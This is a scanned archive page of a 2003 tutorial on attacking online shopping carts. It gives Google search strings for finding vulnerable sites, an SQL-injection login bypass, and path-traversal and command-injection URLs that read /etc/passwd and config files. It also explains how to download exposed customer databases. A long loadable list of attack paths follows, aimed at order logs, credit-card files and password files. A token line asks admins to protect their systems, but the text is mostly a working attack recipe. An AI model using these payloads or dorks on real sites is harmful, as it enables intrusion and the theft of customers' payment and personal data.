packetstormsecurity.com
Open in
urlscan Pro
198.84.60.198
Public Scan
URL:
https://packetstormsecurity.com/files/32406/xmas.txt.html
Submission: On September 10 via manual from US — Scanned from DE
Submission: On September 10 via manual from US — Scanned from DE
Form analysis 2 forms found in the DOM
GET /search/
<form method="get" action="/search/"><input type="text" name="q" id="q" maxlength="120" value="Search …"><button type="submit"></button>
<div id="q-tabs"><label for="s-files" class="on">Files</label><label for="s-news">News</label><label for="s-users">Users</label><label for="s-authors">Authors</label><input type="radio" value="files" name="s" id="s-files"><input type="radio"
value="news" name="s" id="s-news"><input type="radio" value="users" name="s" id="s-users"><input type="radio" value="authors" name="s" id="s-authors"></div>
</form>GET /files/cal/
<form id="cal" action="/files/cal/" method="get">
<h2>File Archive:</h2>
<h3>September 2024</h3>
<button id="cal-prev" name="cal-prev" type="button" value="2024-9"><span><</span></button>
<ul class="dotw">
<li>Su</li>
<li>Mo</li>
<li>Tu</li>
<li>We</li>
<li>Th</li>
<li>Fr</li>
<li>Sa</li>
</ul>
<ul>
<li class="high"><a href="/files/date/2024-09-01/">1</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 1st</div>
<div class="count">261 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-09-02/">2</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 2nd</div>
<div class="count">17 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-09-03/">3</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 3rd</div>
<div class="count">38 Files</div>
</div>
</li>
<li class="high"><a href="/files/date/2024-09-04/">4</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 4th</div>
<div class="count">52 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-09-05/">5</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 5th</div>
<div class="count">23 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-09-06/">6</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 6th</div>
<div class="count">27 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-09-07/">7</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 7th</div>
<div class="count">0 Files</div>
</div>
</li>
</ul>
<ul>
<li class="low"><a href="/files/date/2024-09-08/">8</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 8th</div>
<div class="count">1 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-09-09/">9</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 9th</div>
<div class="count">16 Files</div>
</div>
</li>
<li class="med today"><a href="/files/date/2024-09-10/">10</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 10th</div>
<div class="count">38 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-09-11/">11</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 11th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-09-12/">12</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 12th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-09-13/">13</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 13th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-09-14/">14</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 14th</div>
<div class="count">0 Files</div>
</div>
</li>
</ul>
<ul>
<li class="none"><a href="/files/date/2024-09-15/">15</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 15th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-09-16/">16</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 16th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-09-17/">17</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 17th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-09-18/">18</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 18th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-09-19/">19</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 19th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-09-20/">20</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 20th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-09-21/">21</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 21st</div>
<div class="count">0 Files</div>
</div>
</li>
</ul>
<ul>
<li class="none"><a href="/files/date/2024-09-22/">22</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 22nd</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-09-23/">23</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 23rd</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-09-24/">24</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 24th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-09-25/">25</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 25th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-09-26/">26</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 26th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-09-27/">27</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 27th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-09-28/">28</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 28th</div>
<div class="count">0 Files</div>
</div>
</li>
</ul>
<ul>
<li class="none"><a href="/files/date/2024-09-29/">29</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 29th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-09-30/">30</a>
<div class="stats">
<div class="point"></div>
<div class="date">Sep 30th</div>
<div class="count">0 Files</div>
</div>
</li>
<li></li>
<li></li>
<li></li>
<li></li>
<li></li>
</ul>
</form>Text Content
what you don't know can hurt you
Register | Login
FilesNewsUsersAuthors
Home Files News &[SERVICES_TAB]About Contact Add New
CGI HACKING TUTORIAL
CGI Hacking Tutorial Posted Dec 24, 2003 Authored by fris
CGI hacking tutorial which explains how to find many vulnerable systems using
google and contains an awful lot of URL's.
tags | paper, cgi SHA-256 |
8f5bd59a5a7375fa7149f34226f9495228de9311afd316ccfc4005837cc4449b Download |
Favorite | View
Related Files
SHARE THIS
*
*
* LinkedIn
* Reddit
* Digg
* StumbleUpon
CGI HACKING TUTORIAL
Change Mirror Download
Shopping Carts and Weak Security Explained by fris
Written on December 22nd 2003, Merry Christmas Packetstorm Security.
Lets go Through Some first
Alabanza AlaCart Shopping Cart, this has a SQL Injection. When you access
the admin section all you have to do is enter '=' for login and password
and you have access to everything, and your whole company is vuln. How does
a person find the admin section? Well simple. Ways around google.
You could do a simple search for example inurl:s-cart/admin and results would
come up.
---
CommerceSQL
Regarding:
http://packetstormsecurity.nl/0311-exploits/commerceSQL.txt
People using google again could do a simple search on
inurl:admin/files/order.log
CommerceSQL Proof of Concept as Follows:
example:
www.domain.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
example:
http://www.domain.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
example:
http://www.domain.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
---
Meta Cart:
Meta Cart is a free Ecommerce Shopping Cart System based on ASP and SQL.
the form where the database is located with the information is
http://www.domain.com/database/metacart.mdb
http://www.domain.com/metacart/database/metacart.mdb
So yet again you could do a simple inurl:metacart.mdb in google and find
results and just grab the access database and open it up in access and you
have the companies information. This is why companies need to protect this
data. Its a must for security reasons.
All they would have to do is set the permissions on the database in the
control panel in Information services, But admins are too lazy. They don't
double check. So when Your folder is set to Write, Read and Execute. You know
something is wrong.
They should be set to Write and Execute for Anonymous so people Can't Download
the database. Then rwx on the database itself so you can make changes of
course.
----
SHOP.PL Vuln
Yet another system that people are using against companies, to again access to
their files and get data.
Proof of concept.
http://www.domain.com/cgi-local/shop.pl/page=shop.cfg is where the config file
is located.
http://www.domain.com/cgi-local/shop.pl/page=../../../../../../../../../../../../../../etc/passwd
http://www.domain.com/cgi-local/shop.pl/page=./product_list
and again you can do a simple search in google for inurl: shop.pl
Windows Servers VULN, lazy admins:
A way to get .mdb files (access databases) off ASP servers
Search for shopdisplaycategories.asp
inurl:shopdisplaycategories.asp
plenty of sites use this, once you find some results change the site to.
http://www.domain.com/shopdbtest.asp
now you are in a section in the site which you get info where the mdb file is
laying
xDatabase: shopping and xDblocation:\shop_db now just put
http://www.domain.com/shop_db/shopping.mdb
Bascially you can download their Access database with their whole online shop,
all there customer data, lazy admins that dont put the correct permissions
will leave this open, but smart ones wont let you download the database.
Other Key tricks:
Going in google:
search for "/cgi/shopper.cgi?" or for more results try "/cgi-bin/shopper.cgi?"
("shopcart.cgi" can also be used)
find a site ("your shopping cart" or "Subtotal $0.00") and remove everything
after shopper.cgi
(the url should contain "/cgi/shopper.cgi?display=action"
or
"/cgi-bin/shopper.cgi?display=action" or possibly "checkout=action")
add "?search=action&keywords=%20&template=order.log" to the url
and
/cgi-bin/shopper.cgi?search=action&keywords=apollos%2520&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=cgi_bin%20&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=cgi_bin%2520&template=shopper.conf
/cgi-bin/shopper.cgi?search=action&keywords=powerd0wn%20&template=shopper.conf
/cgi-bin/pdg_cart/shopper.conf
/cgi-bin/products/loadpage.cgi?user_id=id&file=/orders.txt
are some results to play with.
Other Vuln's Using Google searching:
inurl:shopping.mdb
inurl:cart/cart.asp
inurl:/productcart
inurl:vti_inf.html
inurl:service.pwd
inurl:users.pwd
inurl:authors.pwd
inurl:administrators.pwd
inurl:shtml.dll
inurl:shtml.exe
inurl:fpcount.exe
inurl:default.asp
inurl:showcode.asp
inurl:sendmail.cfm
inurl:getFile.cfm
inurl:imagemap.exe
inurl:test.bat
inurl:msadcs.dll
inurl:htimage.exe
inurl:counter.exe
inurl:browser.inc
inurl:hello.bat
inurl:default.asp\
inurl:dvwssr.dll
inurl:cart32.exe
inurl:add.exe
inurl:index.jsp
inurl:SessionServlet
inurl:glimpse
inurl:man.sh
inurl:AT-admin.cgi
inurl:AT-generate.cgi
Once finding a site, you can use various scanners.
WIN32 Scanners:
http://packetstormsecurity.nl/UNIX/cgi-scanners/voideye.zip is a very good one.
http://rhino.deny.de/ Triton Scanner
http://www.ksoze.deny.de/ ksoze's Scanner
http://wolfman.deny.de/ webshare scanner
http://xtremet.deny.de/ cmx scanner
http://www.accessdiver.com Accessdiver
http://www.safety-lab.com you can get Shadow Security Scanner (shareware)
UNIX: (opensource)
http://packetstormsecurity.nl/UNIX/cgi-scanners/nikto-1.31.tar.gz
All of these can load a path list, to test your vuln servers to do auditing,
here is an updated list of security holes. against most of the shopping
carts. Admins please protect your systems, You dont want your customers data
at risk.
---
Loadable List to test security:
--
/store/log_files/your_order.log
/cgi-bin/DCShop/Orders/orders.txt
/vpasp/shopdbtest.asp
/orders/checks.txt
/WebShop/logs
/ccbill/secure/ccbill.log
/scripts/cart32.exe
/cvv2.txt
/cart/shopdbtest.asp
/cgi-win/cart.pl
/shopdbtest.asp
/WebShop/logs/cc.txt
/cgi-local/cart.pl
/PDG_Cart/order.log
/config/datasources/expire.mdb
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/orders/orders.txt
/cgis/cart.pl
/webcart/carts
/cgi-bin/cart32.exe/cart32clientlist
/cgi/cart.pl
/comersus/database/comersus.mdb
/WebShop/templates/cc.txt
/Admin_files/order.log
/orders/mountain.cfg
/cgi-sys/cart.pl
/scripts/cart.pl
/htbin/cart.pl
/productcart/database/EIPC.mdb
/shoponline/fpdb/shop.mdb
/config/datasources/myorder.mdb
/PDG_Cart/shopper.conf
/shopping/database/metacart.mdb
/bin/cart.pl
/cgi-bin/cart32.ini
/database/comersus.mdb
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/store/Admin_files/myorderlog.txt
/cgi-bin/orders.txt
/cgi-bin/store/Admin_files/your_order.log
/test/test.txt
/fpdb/shop.mdb
/cgibin/shop/orders/orders.txt
/shopadmin1.asp
/cgi-bin/shop.cgi
/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
/cgi-bin/PDG_cart/card.txt
/shopper.cgi?preadd=action&key=PROFA&template=order1.log
/store/shopdbtest.asp
/log_files/your_order.log
/_database/expire.mdb
/HyperStat/stat_what.log
/cgibin/DCShop/auth_data/auth_user_file.txt
/htbin/orders/orders.txt
/SHOP/shopadmin.asp
/index.cgi?page=../admin/files/order.log
/vpshop/shopadmin.asp
/webcart/config
/PDG/order.txt
/cgi-bin/shopper.cgi
/orders/order.log
/orders/db/zzzbizorders.log.html
/easylog/easylog.html
/cgi-bin/store/Log_files/your_order.log
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping400.mdb
/comersus_message.asp?
/orders/import.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/admin/html_lib.pl
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log
/HBill/htpasswd
/bin/shop/auth_data/auth_user_file.txt
/cgi-bin/cs/shopdbtest.asp
/mysql/shopping.mdb
/Catalog/config/datasources/Products.mdb
/trafficlog
/cgi/orders/orders.txt
/cgi-local/PDG_Cart/shopper.conf
/store/cgi-bin/Admin_files/expire.mdb
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log
/cgi-bin/mc.txt
/cgi-bin/mall2000.cgi
/cgi-win/DCShop/auth_data/auth_user_file.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log
/store/commerce.cgi
/scripts/shop/orders/orders.txt
/product/shopping350.mdb
/super_stats/access_logs
/cgi-local/orders/orders.txt
/cgi-bin/PDG_Cart/mc.txt
/cgibin/cart32.exe
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other/risinglogorder.log
/cgibin/password.txt
/Catalog/cart/carttrial.dat
/catalog/Admin/Admin.asp
/ecommerce/admin/user/admin.asp
/data/productcart/database/EIPC.mdb
/store/admin_files/commerce_user_lib.pl
/cgi-bin/store/index.cgi
/paynet.txt
/config/datasources/store/billing.mdb
/_database/shopping350.mdb
/cgi-bin/shopper.exe?search
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/store/Admin_files/orders.txt
/cgi-bin/store/commerce_user_lib.pl
/cgi-sys/pagelog.cgi
/cgi-sys/shop.pl/page=;cat%20shop.pl
/scripts/weblog
/fpdb/shopping400.mdb
/htbin/shop/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
/mall_log_files/
/cgi-bin/perlshop.cgi
/tienda/shopdbtest.asp
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.mdb
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log
/WebShop/logs/ck.log
/fpdb/shopping300.mdb
/mysql/store.mdb
/cgi-bin/store/Admin_files/commerce_user_lib.pl
/config.dat
/order/order.log
/commerce_user_lib.pl
/Admin_files/AuthorizeNet_user_lib.pl
/cvv2.asp
/cgi-bin/cart32/CART32-order.txt
/wwwlog
/cool-logs/mlog.html
/cgi-bin/pass/merchant.cgi.log
/cgi-local/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-bin/orders/cc.txt
/cgis/shop/orders/orders.txt
/admin/admin_conf.pl
/cgi-bin/pdg_cart/order.log
/cgi/PDG_Cart/order.log
/Admin_files/ccelog.txt
/cgi-bin/orders/mc.txt
/cgi/cart32.exe
/ecommerce/admin/admin.asp
/scripts/DCShop/auth_data/auth_user_file.txt
/Catalog/config/datasources/Expire.mdb
/ecommerce/admin/shopdbtest.asp
/mysql/mystore.mdb
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.asp
/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
/cgi-bin/Count.cgi?df=callcard.dat
/logfiles/
/shopping/shopping350.mdb
/admin/configuration.pl
/cgis/DCShop/auth_data/auth_user_file.txt
/cgis/cart32.exe
/cgi-bin/dcshop.cgi
/cgi-win/shop/auth_data/auth_user_file.txt
/shopping400.mdb
/HBill/config
/cgi-bin/shop/index.cgi?page=../admin/files/order.log
/search=action&keywords=GSD%20&template=order.log
/WebCart/orders.txt
/PDG_Cart/authorizenets.txt
/cgi-bin/AnyForm2
/~gcw/cgi-bin/Count.cgi?df=callcard.dat
/cgi-bin/PDG_Cart/order.log
/expire.mdb
/logger/
/webcart-lite/orders/import.txt
/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
/cgi-bin/PDG_Cart/shopper.conf
/cgi-bin/cart32.exe
/dc/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/shop.pl/page=shop.cfg
/cgi-local/cart32.exe
/cgi-win/pagelog.cgi
/cgi-win/shop/orders/orders.txt
/cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-bin/www-sql;;;
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order.log
/scripts/orders/orders.txt
/cgi-local/shop.pl/shop.cfg
/search=action&keywords=cwtb%20&template=expire.mdb
/php/mylog.phtml
/config/datasources/shopping.mdb
/php-coolfile/action.php?action=edit&file=config.php
/cgi-bin/ezmall2000/mall2000.cgi
/cgi/DCShop/orders/orders.txt
/cgi-local/shop.pl
/cgis/DCShop/orders/orders.txt
/product/shopdbtest.asp
/ASP/cart/database/metacart.mdb
/cgi-bin/cgi-lib.pl
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/search=action&keywords=cwtb%20&template=order.log
/mysql/expire.mdb
/scripts/shop/auth_data/auth_user_file.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/Shopping%20Cart/shopdbtest.asp
/cgi/shop/auth_data/auth_user_file.txt
/shop/shopping350.mdb
/cgi-bin/store/Authorize_Net.pl
/scripts/DCShop/orders/orders.txt
/store/log_files/commerce_user_lib.pl
/shopping/shopadmin.asp
/cgi-bin/orderlog.txt
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
/cool-logs/mylog.html
/cgibin/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgi-win/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.txt
/SHOP/shopdbtest.asp
/cgi/pagelog.cgi
/php/mlog.phtml
/cgi-bin/shop/apdproducts.mdb
/htbin/shop/auth_data/auth_user_file.txt
/server%20logfile;;;
/database/metacart.mdb
/cgi-local/shop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/log/
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/scripts/c32web.exe
/cgis/orders/orders.txt
/logfile/
/shop_db/shopping.mdb
/shopping.mdb
/weblog/
/config/datasources/cvv2.mdb
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log
/cgi-sys/shop/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.log
/cgi-win/cart32.exe
/cgi-bin/loadpage.cgi
/dcshop/orders/orders.txt
/shop/show.php?q='
/cgibin/orders/orders.txt
/bin/pagelog.cgi
/cgi-bin/shop/orders/orders.txt
/_database/shopdbtest.asp
/cgibin/pagelog.cgi
/cgi-local/shop.pl/page=;cat%20shop.pl
/shop/search.php?q='
/cgi-sys/cart32.exe
/order13.txt
/weblogs/
/orderb/shop.mdb
/config/datasources/order.mdb
/store/cgi-bin/Admin_files/Store_user_lib.pl
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
/Orders/order.log
/logs/access_log
/config/datasources/your_order.mdb
/ecommerce/admin/admin/admin.asp
/mall_log_files/order.log
/bin/cart32.exe
/htbin/DCShop/orders/orders.txt
/Admin_files/Authorize_Net.pl
/logging/
/database/
/cgi-sys/shop/auth_data/auth_user_file.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi-local/shop/auth_data/auth_user_file.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-win/DCShop/orders/orders.txt
/store/Admin_files/Authorize_Net.pl
/cart/cart.asp
/bin/DCShop/orders/orders.txt
/scripts/pagelog.cgi
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=expire.mdb
/webcart/config/clients.txt
/dc/auth_data/auth_user_file.txt
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
/bin/orders/orders.txt
/cgi-bin/Web_Store/web_store.cgi
/cgis/pagelog.cgi
/cgi-bin/orders/orders.txt
/merchant/shopdbtest.asp
/cgi-local/shop.pl/page=shop.cfg
/cgis/shop.pl/page=;cat%20shop.pl
/index.cgi?%20pagine%20=%20../../../../../../../../etc/passwd
/cg-bin/
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/ecommerce/admin/adminLeft/admin.asp
/webcart/orders/import.txt
/cgibin/shop/auth_data/auth_user_file.txt
/productcart/database/eipc.mdb
/mysql/cheersoundchdb.mdb
/cgi-bin/order.txt
/scripts/iisadmin/tools/mkilog.exe
/ProductCart/database/EIPC.mdb
/databases/
/cgi-sys/orders/orders.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/database/EIPC.mdb
//cgi-bin/orders.txt
/vpasp-shopcart/shopdbtest.asp
/cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=order.log
/cgi-bin/DCShop/orders/orders.txt
/mysql/shopping350.mdb
/_database/shopping.mdb
/htbin/cart32.exe
/PDG_Cart/shopper.config
/cgis/shop/auth_data/auth_user_file.txt
/shop/SHOPDBTEST.ASP
/bin/shop/orders/orders.txt
//cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/store/dcshop_admin.cgi
/_database/shopping400.mdb
/scripts/shop.pl/page=;cat%20shop.pl
/cgibin/PDG_Cart/shopper.conf
/cgibin/DCShop/orders/orders.txt
/cgibin/%20awstats.pl?output=keywords
/cgi/shop/orders/orders.txt
/cgi-bin/cart32_old.exe
/webshop/templates/cc.txt
/webcart/orders
/productcart/database/shop.mdb
/index.php?link=order
/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
/shopping/shopdisplayproducts.asp?
/ccbill-local.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi-bin/c32web.exe/CheckError?error=53
/server/admin_files/commerce_user_lib.pl
/shopping/shopdisplayproducts.asp?id=1&cat=order.log
/mail.cgi
/cgibin/admin_files/
/cgi-bin/mail/form.cgi
/cgibin/shopping/database/metacart.mdb
/globill/ver12otellog.txt
/cgi-bin/shopping.mdb
/shopping%20.mdb
/cgi-bin/mail.cgi
/cgi-bin/FORM.cgi
/cgibin/shop/database/metacart.mdb
/mail/form.cgi
/cgibin/shop/shopping350.mdb
/form.cgi
/shopping/cgi-bin/cart32.ini
/index.cgi?page=../../../../../../../../etc/passwd
/cgi-bin/c32web.exe/ShowProgress
/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto
/cgibin/orders.txt
/cgibin/scripts/shop/shopping350.mdb
/form/mail.cgi
/cgi-bin/store1b/index.cgi?page=../../../../../../../../etc/passwd
/webshop/logs/cc.txt
/form/form.cgi
/store/index.cgi?page=../../../../../../../../etc/passwd
/cgibin/awstats.pl%3Flang%3Dit%26output%3Durldetail
/cgibin/%20awstats.pl?
/cgi-bin/Form.cgi
/vpasp/shopdisplayproducts.asp?cat=admin'%20and%20fldpassword%0li%20ke%20'a%25
/admin.mdb
/cgi-bin/cart32.exe/error
/cgi/mail.cgi
/cgi-bin/c32web.exe/ShowAdminDir
/cgi-bin/csql/index.cgi?page=../admin/files/order.log
/cgi-bin/admin_files/
/cgi-bin/csql/index.cgi?page=../../../../../../../../etc/passwd
/admins.asp
/cgi-bin/cart_top
/cgi-bin/mail/mail.cgi
/shopadmin.asp
/cgi-bin/order.log
/mailform.pl
/cgibin/admin.pl
/vpasp/shopdisplayproducts.asp?
/policies1.htm
/cgi-bin/c32web_old.exe
/cgi-bin/c32web.exe
/cgi-bin/form/form.cgi
/cgibin/metacart.mdb
/shopdisplayproducts.asp
/cgi-sys/DCShop/orders/orders.txt
/ccbill6/secure/
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=3124&STRMVER=4&CAPREQ=0
/cgi-bin/ibill.log
/ccbill6/
/password.txt
/cgi-bin/PDG_cart/card
/cgibin/www.google.com
/honeymoonhideaway.htm+honeymoon+charleston
/cgibin/awstats.pl%3Flang%3Dnl
/cgibin/admin.pl?setpasswd
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D07
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D08
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D09
/cgibin/%20awstats.pl?output=keywords
/shop/shopping450.mdb
/ccbill6/secure/ccbill.log
/cgibin/awstats.pl%3Flang%3Des%26update%3D1
/cgibin/shopper.cgi?search=action&keywords=ccpower%20&template=shopper.conf
/cgi-bin/form.cgi
/M83A
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D11
/cgibin/amadmin.pl?setpasswd
/cgi-bin/awstats.pl%3Flang%3Dit
/orderdb/database/eipc.mdb
/cg-bin//eshop/database/order.mdb
/store/database/comersus.mdb
/cgibin/password.mdb
/~admin/guestbook
/cgibin/%20awstats.pl?%20cgibin/%20awstats.pl?output=keywords
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dnl
/cgibin/%20awstats.pl?output=keywords
/sumthin
/cgibin/cgibin/%20awstats.pl?output=keywords
/cgi-bin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf
/cgibin/productcart/database/eipc.mdb
/cgibin/awstats.pl%3Flang%3Den%26output%3Durldetail
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dit
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dde
/mail/mail.cgi
/cgibin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dnl
/cg/.%20/comersus/database/comersus.mdb
/index%20of%20/%20productcart/database/eipc.mdb
/scripts/nsiislog.dll
/cgibin/order.cgi
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0
/cgi-bin/awstats.pl%3Flang%3Dde
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=3124&STRMVER=4&CAPREQ=0
/cgibinserver/admin_files/commerce_user_lib.pl
/cgibin/store/Admin_files/myorderlog.txt
//cgibin/orders.txt
/cgibin/database/shopping.mdb
/cgibin/shopping/shopadmin.asp
/cgi-bin/shopper.cgi?preadd=action&key=PROFA&template=order1.log
/cgibin/shopper.exe?search=action&keywords=psiber&template=order.log
/cgibin/allmanageup.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/eshop/database/log.mdb
/cgibin/awsta
/cgibin/nph-proxy.pl
/cgibin/awstats.pl%3Flang%3Dnl%26update%3D1
//config/datasources/expire.mdb
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Den
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Des
/cgibin/ccbill/password/.htpasswd
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D08
/cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeyphrases
/eshop/en/database/credit.mdb
/cgi-bin/pdg_cart/shopper.conf
/password.mdb
/data/verotellog.txt
/cgibin/awstats.pl%3Foutput%3Durldetail%26update%3D1
/productcart/eipc.mdb
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D11
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dit
/index%20of%20/webshop/templates/cc.txt
/cartdb/database/eipc.mdb
/cgi-bin/eshop/database/order.mdb
/cgibin//fpdb/shopping400.mdb
/cgibin/order.txt
/cgi-bin/cart32.exe/expdate%20algunas%20veces
/cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeywords
/cgibin/database/comersus.mdb
/cgi-bin/awstats.pl%3Flang%3Des
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dfr
/globill/
/cgibin/fpdb/shopping400.mdb
/cgibin/perl.exe
/eshop/en/database/log.mdb
/cgibin/shopper.exe?search=action&keywords=psiber&template=orders.log
/cg/comersus/database/comersus.mdb
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D07
/cgibin/awstats.pl%3Flang%3Dnl%26output%3Durldetail
/cgibin/admin.mdb
/cgi-bin/whereami.cgi?g=ls
/cgibin/xxxhu
/cgibin/cartserver/admin_files/commerce_user_lib.pl
/cgibin/%20awstats.pl?output=keywords
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dfr
/robot.txt
